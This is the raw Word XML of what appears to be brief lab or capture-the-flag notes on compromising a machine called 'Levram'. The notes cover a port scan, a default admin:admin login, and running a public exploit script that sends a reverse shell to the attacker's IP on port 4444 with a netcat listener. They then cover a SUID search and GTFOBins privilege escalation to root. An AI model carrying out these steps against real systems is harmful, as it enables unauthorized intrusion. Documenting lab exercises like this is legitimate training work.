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7FF401F0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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D161CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Levram</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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5DFF862B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D161C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161CC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D161CC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D161CC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D161CC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D161CC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D161CC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D161CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D161CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D161CC"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6BEF976C" w:rsidR="00843DCE" w:rsidRDefault="00D161C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visit website with 8000 and login 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admin:admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3EF5D154" w14:textId="61C2FCDF" w:rsidR="00D161CC" w:rsidRDefault="0078755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it shows the version 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32CCC516" w14:textId="77777777" w:rsidR="004E5F6B" w:rsidRDefault="004E5F6B" w:rsidP="004E5F6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find exploit of it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B1BD46" w14:textId="77777777" w:rsidR="004E5F6B" w:rsidRDefault="004E5F6B" w:rsidP="004E5F6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download it and take to our place</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1" w14:textId="5D229F53" w:rsidR="00843DCE" w:rsidRDefault="004E5F6B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chmod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+x it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1AF49398" w14:textId="77777777" w:rsidR="004E5F6B" w:rsidRDefault="004E5F6B" w:rsidP="004E5F6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50640.py -t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8000 – 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our_ip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– P 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CF0104" w14:textId="77777777" w:rsidR="004E5F6B" w:rsidRDefault="004E5F6B" w:rsidP="004E5F6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start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netcat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listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2766C548" w14:textId="77777777" w:rsidR="004E5F6B" w:rsidRDefault="004E5F6B" w:rsidP="004E5F6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find / -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAB11EE" w14:textId="77777777" w:rsidR="004E5F6B" w:rsidRDefault="004E5F6B" w:rsidP="004E5F6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gtfobins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add python and capability add to there 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7C777814" w14:textId="77777777" w:rsidR="004E5F6B" w:rsidRDefault="004E5F6B" w:rsidP="004E5F6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then notice on the website about the finding of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E469752" w14:textId="77777777" w:rsidR="004E5F6B" w:rsidRDefault="004E5F6B" w:rsidP="004E5F6B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gtfobins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privilege access as root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4527E899" w14:textId="77777777" w:rsidR="004E5F6B" w:rsidRDefault="004E5F6B" w:rsidP="004E5F6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and obtained the steps as to direct root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27131E2F" w14:textId="77777777" w:rsidR="004E5F6B" w:rsidRDefault="004E5F6B" w:rsidP="004E5F6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follow it and we get the shell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64214A56" w14:textId="77D26FF7" w:rsidR="00843DCE" w:rsidRPr="00843DCE" w:rsidRDefault="004E5F6B" w:rsidP="004E5F6B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on Desktop we obtain proof.txt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427E37"/>
    <w:rsid w:val="004E364D"/>
    <w:rsid w:val="004E5F6B"/>
    <w:rsid w:val="00787556"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="009139D2"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00C86D91"/>
    <w:rsid w:val="00CC329C"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D029ED"/>
    <w:rsid w:val="00D161CC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7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-01T13:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>